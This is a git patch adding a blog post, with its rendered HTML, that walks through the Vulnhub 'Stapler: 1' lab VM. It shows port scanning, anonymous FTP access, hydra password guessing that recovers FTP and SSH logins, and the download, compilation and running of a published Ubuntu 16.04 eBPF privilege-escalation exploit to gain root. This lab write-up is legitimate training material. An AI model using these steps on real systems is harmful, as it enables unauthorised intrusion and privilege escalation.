From 8a852e04fee4a3c62b23d96f0c8c98375c5e3eb7 Mon Sep 17 00:00:00 2001 From: Paul Walko Date: Sun, 19 Jun 2016 18:14:01 -0400 Subject: [PATCH] stapler: 1 --- _posts/2016-06-19-stapler_walkthough.md | 291 +++++++++++ _site/category/index.html | 31 +- _site/index.html | 26 + _site/sitemap.txt | 1 + _site/sitemap.xml | 8 +- _site/stapler_walkthough.html | 1 + _site/stylesheets/base.css | 1 + _site/tag/index.html | 100 ++++ ...ttp_headers_and_PHP_header()_function.html | 155 ------ _site/writeup/stapler_walkthough.html | 475 ++++++++++++++++++ _site/writeup/test_post.html | 183 ------- stylesheets/base.css | 1 + 12 files changed, 933 insertions(+), 340 deletions(-) create mode 100644 _posts/2016-06-19-stapler_walkthough.md create mode 100644 _site/stapler_walkthough.html delete mode 100644 _site/writeup/Http_headers_and_PHP_header()_function.html create mode 100644 _site/writeup/stapler_walkthough.html delete mode 100644 _site/writeup/test_post.html diff --git a/_posts/2016-06-19-stapler_walkthough.md b/_posts/2016-06-19-stapler_walkthough.md new file mode 100644 index 0000000..636726d --- /dev/null +++ b/_posts/2016-06-19-stapler_walkthough.md @@ -0,0 +1,291 @@ +--- +title: "Stapler: 1 Vulnhub Walkthrough" +layout: post +category: writeup +tags: [vulnhub, hacking] +excerpt: "Walkthrough for Stapler: 1 VM on Vulnhub" +--- + +# Figure out the IP + +``` +paul@archyoga [05:31:55] [~] +-> % nmap -sn 192.168.1.0/24 + +Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT +. +. +. +Nmap scan report for red (192.168.1.135) +Host is up (0.0030s latency). +. +. +. +Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds +``` + +Let's see what's there: + +``` +paul@archyoga [05:33:59] [~] +-> % nmap -Pn 192.168.1.135 + +Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT +Nmap scan report for red (192.168.1.135) +Host is up (0.011s latency). +Not shown: 992 filtered ports +PORT STATE SERVICE +20/tcp closed ftp-data +21/tcp open ftp +22/tcp open ssh +53/tcp open domain +80/tcp open http +139/tcp open netbios-ssn +666/tcp open doom +3306/tcp open mysql + +Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds +``` + +# Login to ftp + +``` +paul@archyoga [05:34:57] [~] +-> % ftp +ftp> open 192.168.1.135 +Connected to 192.168.1.135. +220- +220-|-----------------------------------------------------------------------------------------| +220-| Harry, make sure to update the banner when you get a chance to show who has access here | +220-|-----------------------------------------------------------------------------------------| +220- +220 +Name (192.168.1.135:paul): anonymous +331 Please specify the password. +Password: +230 Login successful. +Remote system type is UNIX. +Using binary mode to transfer files. +ftp> ls +200 PORT command successful. Consider using PASV. +150 Here comes the directory listing. +-rw-r--r-- 1 0 0 107 Jun 03 23:06 note +226 Directory send OK. +ftp> get note +200 PORT command successful. Consider using PASV. +150 Opening BINARY mode data connection for note (107 bytes). +226 Transfer complete. +107 bytes received in 5.1e-05 seconds (2 Mbytes/s) +ftp> 221 Goodbye. + +paul@archyoga [05:36:17] [~] +-> % cat note +Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. +``` + +Turns out it is, and inside is a file named ```note``` which names an ftp user: ```elly```. +I used hydra to test some common passwords and that worked out: + +``` +paul@archyoga [05:39:21] [~] +-> % hydra -l elly -e nsr 92.168.1.135 ftp +Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. + +Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36 +[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort... +[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task +[DATA] attacking service ftp on port 21 +[21][ftp] host: 192.168.1.135 login: elly password: ylle +1 of 1 target successfully completed, 1 valid password found +Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50 +``` + +Now we can login to ftp as elly using the password ```ylle```. On the ftp server there's a passwd file, so I can use that as a user list to test against: + +``` +paul@archyoga [05:42:07] [~] +-> % ftp +ftp> open 192.168.1.135 +Connected to 192.168.1.135. +220- +220-|-----------------------------------------------------------------------------------------| +220-| Harry, make sure to update the banner when you get a chance to show who has access here | +220-|-----------------------------------------------------------------------------------------| +220- +220 +Name (192.168.1.135:paul): elly +331 Please specify the password. +Password: +230 Login successful. +Remote system type is UNIX. +Using binary mode to transfer files. +ftp> ls +200 PORT command successful. Consider using PASV. +150 Here comes the directory listing. +. +. +. +-rw-r--r-- 1 0 0 2908 Jun 04 20:14 passwd +. +. +. +ftp> get passwd +200 PORT command successful. Consider using PASV. +150 Opening BINARY mode data connection for passwd (2908 bytes). +226 Transfer complete. +2908 bytes received in 9.9e-05 seconds (28 Mbytes/s) +ftp> 221 Goodbye. +``` + +# Login over ssh & exploit + +Using hydra again I discovered a login for ssh from the passwd file: + +``` +paul@archyoga [05:42:36] [~] +-> % awk -F':' '{ print $1}' passwd > users + + +-> % hydra -e nsr -L ./users 192.168.1.135 ssh +Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. + +Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42 +[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 +[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task +[DATA] attacking service ssh on port 22 +[22][ssh] host: 192.168.1.135 login: SHayslett password: SHayslett +``` + +Then once I determined the release I went over to [http://exploit-db.com](http://exploit-db.com) and searched "ubuntu 16.04" and found this: https://www.exploit-db.com/exploits/39772/ + +Now for the exploit: + +``` +paul@archyoga [05:50:44] [~] +-> % ssh SHayslett@192.168.1.135 +----------------------------------------------------------------- +~ Barry, don't forget to put a message here ~ +----------------------------------------------------------------- +SHayslett@192.168.1.135's password: +Welcome back! + + +SHayslett@red:~$ lsb_release -a +No LSB modules are available. +Distributor ID: Ubuntu +Description: Ubuntu 16.04 LTS +Release: 16.04 +Codename: xenial +SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip +--2016-06-19 18:49:36-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip +Resolving github.com (github.com)... 192.30.252.130 +Connecting to github.com (github.com)|192.30.252.130|:443... connected. +HTTP request sent, awaiting response... 302 Found +Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following] +--2016-06-19 18:49:36-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133 +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected. +HTTP request sent, awaiting response... 200 OK +Length: 7115 (6.9K) [application/zip] +Saving to: ‘39772.zip’ + +39772.zip 100%[=====================================================================================================================================================================================================>] 6.95K --.-KB/s in 0s + +2016-06-19 18:49:37 (94.2 MB/s) - ‘39772.zip’ saved [7115/7115] + +SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo +--2016-06-19 18:52:05-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi +Resolving github.com (github.com)... 192.30.252.128 +Connecting to github.com (github.com)|192.30.252.128|:443... connected. +HTTP request sent, awaiting response... 302 Found +Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3 +--2016-06-19 18:52:05-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133 +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected. +HTTP request sent, awaiting response... 200 OK +Length: 7115 (6.9K) [application/zip] +Saving to: ‘39772.zip’ + +39772.zip 100%[======================= + +2016-06-19 18:52:05 (4.75 MB/s) - ‘39772.zip’ saved [7115/7115] + +SHayslett@red:~/tmp$ unzip * +Archive: 39772.zip + creating: 39772/ +. +. +. +SHayslett@red:~/tmp$ cd *2 +SHayslett@red:~/tmp/39772$ ls +crasher.tar exploit.tar +SHayslett@red:~/tmp/39772$ tar xf exploit.tar +SHayslett@red:~/tmp/39772$ ls +crasher.tar ebpf_mapfd_doubleput_exploit exploit.tar +SHayslett@red:~/tmp/39772$ cd e* +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput.c hello.c suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh +doubleput.c: In function ‘make_setuid’: +doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .insns = (__aligned_u64) insns, + ^ +doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .license = (__aligned_u64)"" + ^ +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput +starting writev +woohoo, got pointer reuse +writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. +suid file detected, launching rootshell... +we have root privs now... +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root +SHayslett@red:~/tmp/39772$ cd e* +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput.c hello.c suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh +doubleput.c: In function ‘make_setuid’: +doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .insns = (__aligned_u64) insns, + ^ +doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] + .license = (__aligned_u64)"" + ^ +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls +compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput +starting writev +woohoo, got pointer reuse +writev returned successfully. if this worked, you'll have a root shell in <=60 seconds. +suid file detected, launching rootshell... +we have root privs now... +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# +``` + +This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/. + +Next, the flag! + +``` +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root +root@red:/root# ls +fix-wordpress.sh flag.txt issue python.sh wordpress.sql +root@red:/root# cat flag.txt +~~~~~~~~~~<(Congratulations)>~~~~~~~~~~ + .-'''''-. + |'-----'| + |-.....-| + | | + | | + _,._ | | + __.o` o`"-. | | + .-O o `"-.o O )_,._ | | +( o O o )--.-"`O o"-.`'-----'` + '--------' ( o O o) + `----------` +b6b545dc11b7a270f4bad23432190c75162c4a2b +``` + +Woo! diff --git a/_site/category/index.html b/_site/category/index.html index 8ebaae9..3905a06 100644 --- a/_site/category/index.html +++ b/_site/category/index.html @@ -122,7 +122,7 @@
  • writeup - 1 + 2
  • @@ -152,6 +152,35 @@ +
    +
    +

    19

    +

    Jun/2016

    +

    writeup

    +
    + +
    +

    Stapler: 1 Vulnhub Walkthrough

    +
      + +
    • vulnhub
    • + +
    • hacking
    • + +
    +
    +
    +

    + Walkthrough for Stapler: 1 VM on Vulnhub +

    +
    + + +
    + + + +

    14

    diff --git a/_site/index.html b/_site/index.html index 91e7629..b477c4e 100644 --- a/_site/index.html +++ b/_site/index.html @@ -120,6 +120,32 @@ + +

    14

    diff --git a/_site/sitemap.txt b/_site/sitemap.txt index 92f05eb..d7d8f5d 100644 --- a/_site/sitemap.txt +++ b/_site/sitemap.txt @@ -1,3 +1,4 @@ +http://paul.walko.org//writeup/stapler_walkthough http://paul.walko.org//writeup/nebula_exploit_exercises diff --git a/_site/sitemap.xml b/_site/sitemap.xml index c094d4e..16abb4f 100644 --- a/_site/sitemap.xml +++ b/_site/sitemap.xml @@ -4,9 +4,15 @@ xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd"> + + http://paul.walko.org//writeup/stapler_walkthough + 2016-06-19T18:13:08-04:00 + weekly + + http://paul.walko.org//writeup/nebula_exploit_exercises - 2016-06-19T02:35:49-04:00 + 2016-06-19T18:13:08-04:00 weekly diff --git a/_site/stapler_walkthough.html b/_site/stapler_walkthough.html new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/_site/stapler_walkthough.html @@ -0,0 +1 @@ + diff --git a/_site/stylesheets/base.css b/_site/stylesheets/base.css index 27d33a8..4643a78 100755 --- a/_site/stylesheets/base.css +++ b/_site/stylesheets/base.css @@ -211,6 +211,7 @@ pre, samp { font-family: monospace, monospace; font-size: 1em; + background-color:rgba(192,192,192,0.6); } /* Forms diff --git a/_site/tag/index.html b/_site/tag/index.html index c785355..117e67d 100644 --- a/_site/tag/index.html +++ b/_site/tag/index.html @@ -141,6 +141,15 @@ hacking + 2 + + + + +
  • + + + vulnhub 1
  • @@ -303,6 +312,35 @@ + + + + +

    14

    @@ -336,6 +374,68 @@ +
    + + +
    + + + + + + +
    + + + + + + + + + + + + + + + + + + + + + + + + + + +
    diff --git a/_site/writeup/Http_headers_and_PHP_header()_function.html b/_site/writeup/Http_headers_and_PHP_header()_function.html deleted file mode 100644 index 2108af9..0000000 --- a/_site/writeup/Http_headers_and_PHP_header()_function.html +++ /dev/null @@ -1,155 +0,0 @@ - - - - - - - - - - -Test post; Please Ignore - - - - - - - - - - - - - - - - - - - -
    -
    -
    -
    -

    Test post; Please Ignore

    - -
      - -
    • exploit-exercises
    • - -
    • nebula
    • - -
    • hacking
    • - -
    - -

    posted on 26 Sep 2015 under category writeup

    - -
    - -

    Really through, ignore this post.

    - -
    - -
    -
    - -
    - - - -
    -
    - - - - - - - - - - diff --git a/_site/writeup/stapler_walkthough.html b/_site/writeup/stapler_walkthough.html new file mode 100644 index 0000000..4e4c5cd --- /dev/null +++ b/_site/writeup/stapler_walkthough.html @@ -0,0 +1,475 @@ + + + + + + + + + + + + + +Stapler: 1 Vulnhub Walkthrough + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    +
    +
    +

    Stapler: 1 Vulnhub Walkthrough

    + +
      + +
    • vulnhub
    • + +
    • hacking
    • + +
    + +

    posted on 19 Jun 2016 under category writeup

    + +
    + +

    Figure out the IP

    + +
    paul@archyoga [05:31:55] [~]
    +-> % nmap -sn 192.168.1.0/24
    +
    +Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:32 EDT
    +.
    +.
    +.
    +Nmap scan report for red (192.168.1.135)
    +Host is up (0.0030s latency).
    +.
    +.
    +.
    +Nmap done: 256 IP addresses (16 hosts up) scanned in 3.59 seconds
    +
    +
    + +

    Let’s see what’s there:

    + +
    paul@archyoga [05:33:59] [~]
    +-> % nmap -Pn 192.168.1.135
    +
    +Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-19 17:34 EDT
    +Nmap scan report for red (192.168.1.135)
    +Host is up (0.011s latency).
    +Not shown: 992 filtered ports
    +PORT     STATE  SERVICE
    +20/tcp   closed ftp-data
    +21/tcp   open   ftp
    +22/tcp   open   ssh
    +53/tcp   open   domain
    +80/tcp   open   http
    +139/tcp  open   netbios-ssn
    +666/tcp  open   doom
    +3306/tcp open   mysql
    +
    +Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds
    +
    +
    + +

    Login to ftp

    + +
    paul@archyoga [05:34:57] [~]
    +-> % ftp
    +ftp> open 192.168.1.135
    +Connected to 192.168.1.135.
    +220-
    +220-|-----------------------------------------------------------------------------------------|
    +220-| Harry, make sure to update the banner when you get a chance to show who has access here |
    +220-|-----------------------------------------------------------------------------------------|
    +220-
    +220
    +Name (192.168.1.135:paul): anonymous
    +331 Please specify the password.
    +Password:
    +230 Login successful.
    +Remote system type is UNIX.
    +Using binary mode to transfer files.
    +ftp> ls
    +200 PORT command successful. Consider using PASV.
    +150 Here comes the directory listing.
    +-rw-r--r--    1 0        0             107 Jun 03 23:06 note
    +226 Directory send OK.
    +ftp> get note
    +200 PORT command successful. Consider using PASV.
    +150 Opening BINARY mode data connection for note (107 bytes).
    +226 Transfer complete.
    +107 bytes received in 5.1e-05 seconds (2 Mbytes/s)
    +ftp> 221 Goodbye.
    +
    +paul@archyoga [05:36:17] [~]
    +-> % cat note
    +Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
    +
    +
    + +

    Turns out it is, and inside is a file named note which names an ftp user: elly. +I used hydra to test some common passwords and that worked out:

    + +
    paul@archyoga [05:39:21] [~]
    +-> % hydra -l elly -e nsr 92.168.1.135 ftp
    +Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    +
    +Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:39:36
    +[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
    +[DATA] max 3 tasks per 1 server, overall 64 tasks, 3 login tries (l:1/p:3), ~0 tries per task
    +[DATA] attacking service ftp on port 21
    +[21][ftp] host: 192.168.1.135   login: elly   password: ylle
    +1 of 1 target successfully completed, 1 valid password found
    +Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-19 17:39:50
    +
    +
    + +

    Now we can login to ftp as elly using the password ylle. On the ftp server there’s a passwd file, so I can use that as a user list to test against:

    + +
    paul@archyoga [05:42:07] [~]
    +-> % ftp                                     
    +ftp> open 192.168.1.135
    +Connected to 192.168.1.135.
    +220-
    +220-|-----------------------------------------------------------------------------------------|
    +220-| Harry, make sure to update the banner when you get a chance to show who has access here |
    +220-|-----------------------------------------------------------------------------------------|
    +220-
    +220
    +Name (192.168.1.135:paul): elly
    +331 Please specify the password.
    +Password:
    +230 Login successful.
    +Remote system type is UNIX.
    +Using binary mode to transfer files.
    +ftp> ls
    +200 PORT command successful. Consider using PASV.
    +150 Here comes the directory listing.
    +.
    +.
    +.
    +-rw-r--r--    1 0        0            2908 Jun 04 20:14 passwd
    +.
    +.
    +.
    +ftp> get passwd
    +200 PORT command successful. Consider using PASV.
    +150 Opening BINARY mode data connection for passwd (2908 bytes).
    +226 Transfer complete.
    +2908 bytes received in 9.9e-05 seconds (28 Mbytes/s)
    +ftp> 221 Goodbye.
    +
    +
    + +

    Login over ssh & exploit

    + +

    Using hydra again I discovered a login for ssh from the passwd file:

    + +
    paul@archyoga [05:42:36] [~]
    +-> % awk -F':' '{ print $1}' passwd > users
    +
    +
    +-> % hydra -e nsr -L ./users 192.168.1.135 ssh  
    +Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
    +
    +Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-19 17:44:42
    +[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    +[DATA] max 16 tasks per 1 server, overall 64 tasks, 183 login tries (l:61/p:3), ~0 tries per task
    +[DATA] attacking service ssh on port 22
    +[22][ssh] host: 192.168.1.135   login: SHayslett   password: SHayslett
    +
    +
    + +

    Then once I determined the release I went over to http://exploit-db.com and searched “ubuntu 16.04” and found this: https://www.exploit-db.com/exploits/39772/

    + +

    Now for the exploit:

    + +
    paul@archyoga [05:50:44] [~]
    +-> % ssh SHayslett@192.168.1.135
    +-----------------------------------------------------------------
    +~          Barry, don't forget to put a message here           ~
    +-----------------------------------------------------------------
    +SHayslett@192.168.1.135's password:
    +Welcome back!
    +
    +
    +SHayslett@red:~$ lsb_release -a
    +No LSB modules are available.
    +Distributor ID: Ubuntu
    +Description:    Ubuntu 16.04 LTS
    +Release:        16.04
    +Codename:       xenial
    +SHayslett@red:~$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
    +--2016-06-19 18:49:36--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip
    +Resolving github.com (github.com)... 192.30.252.130
    +Connecting to github.com (github.com)|192.30.252.130|:443... connected.
    +HTTP request sent, awaiting response... 302 Found
    +Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip [following]
    +--2016-06-19 18:49:36--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip
    +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.44.133
    +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.44.133|:443... connected.
    +HTTP request sent, awaiting response... 200 OK
    +Length: 7115 (6.9K) [application/zip]
    +Saving to: ‘39772.zip’
    +
    +39772.zip                                                                     100%[=====================================================================================================================================================================================================>]   6.95K  --.-KB/s    in 0s      
    +
    +2016-06-19 18:49:37 (94.2 MB/s) - ‘39772.zip’ saved [7115/7115]
    +
    +SHayslett@red:~/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/splo
    +--2016-06-19 18:52:05--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploi
    +Resolving github.com (github.com)... 192.30.252.128
    +Connecting to github.com (github.com)|192.30.252.128|:443... connected.
    +HTTP request sent, awaiting response... 302 Found
    +Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/3
    +--2016-06-19 18:52:05--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/m
    +Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 23.235.46.133
    +Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|23.235.46.133|:443... connected.
    +HTTP request sent, awaiting response... 200 OK
    +Length: 7115 (6.9K) [application/zip]
    +Saving to: ‘39772.zip’
    +
    +39772.zip                                                                       100%[=======================
    +
    +2016-06-19 18:52:05 (4.75 MB/s) - ‘39772.zip’ saved [7115/7115]
    +
    +SHayslett@red:~/tmp$ unzip *
    +Archive:  39772.zip
    +   creating: 39772/
    +.
    +.
    +.
    +SHayslett@red:~/tmp$ cd *2
    +SHayslett@red:~/tmp/39772$ ls
    +crasher.tar  exploit.tar
    +SHayslett@red:~/tmp/39772$ tar xf exploit.tar
    +SHayslett@red:~/tmp/39772$ ls
    +crasher.tar  ebpf_mapfd_doubleput_exploit  exploit.tar
    +SHayslett@red:~/tmp/39772$ cd e*
    +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
    +compile.sh  doubleput.c  hello.c  suidhelper.c
    +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
    +doubleput.c: In function ‘make_setuid’:
    +doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    +    .insns = (__aligned_u64) insns,
    +             ^
    +doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    +    .license = (__aligned_u64)""
    +               ^
    +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
    +compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
    +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
    +starting writev
    +woohoo, got pointer reuse
    +writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
    +suid file detected, launching rootshell...
    +we have root privs now...
    +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
    +SHayslett@red:~/tmp/39772$ cd e*
    +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
    +compile.sh  doubleput.c  hello.c  suidhelper.c
    +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
    +doubleput.c: In function ‘make_setuid’:
    +doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    +    .insns = (__aligned_u64) insns,
    +             ^
    +doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    +    .license = (__aligned_u64)""
    +               ^
    +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
    +compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
    +SHayslett@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
    +starting writev
    +woohoo, got pointer reuse
    +writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
    +suid file detected, launching rootshell...
    +we have root privs now...
    +root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit#
    +
    +
    + +

    This part might be a little hard to read, but all I did was follow the instructions from the exploit page pretty much word for word: https://www.exploit-db.com/exploits/39772/.

    + +

    Next, the flag!

    + +
    root@red:~/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
    +root@red:/root# ls
    +fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
    +root@red:/root# cat flag.txt
    +~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
    +                          .-'''''-.
    +                          |'-----'|
    +                          |-.....-|
    +                          |       |
    +                          |       |
    +         _,._             |       |
    +    __.o`   o`"-.         |       |
    + .-O o `"-.o   O )_,._    |       |
    +( o   O  o )--.-"`O   o"-.`'-----'`
    + '--------'  (   o  O    o)  
    +              `----------`
    +b6b545dc11b7a270f4bad23432190c75162c4a2b
    +
    +
    + +

    Woo!

    + +
    + +
    +
    + +
    + + + +
    +
    + + + + + + + + + + diff --git a/_site/writeup/test_post.html b/_site/writeup/test_post.html deleted file mode 100644 index b9821e4..0000000 --- a/_site/writeup/test_post.html +++ /dev/null @@ -1,183 +0,0 @@ - - - - - - - - - - - - -Test post; Please Ignore - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    -
    -
    -
    -

    Test post; Please Ignore

    - -
      - -
    • exploit-exercises
    • - -
    • nebula
    • - -
    • hacking
    • - -
    - -

    posted on 26 Sep 2015 under category writeup

    - -
    - -

    Really through, ignore this post.

    - -
    - -
    -
    - -
    - - - -
    -
    - - - - - - - - - - diff --git a/stylesheets/base.css b/stylesheets/base.css index 27d33a8..4643a78 100755 --- a/stylesheets/base.css +++ b/stylesheets/base.css @@ -211,6 +211,7 @@ pre, samp { font-family: monospace, monospace; font-size: 1em; + background-color:rgba(192,192,192,0.6); } /* Forms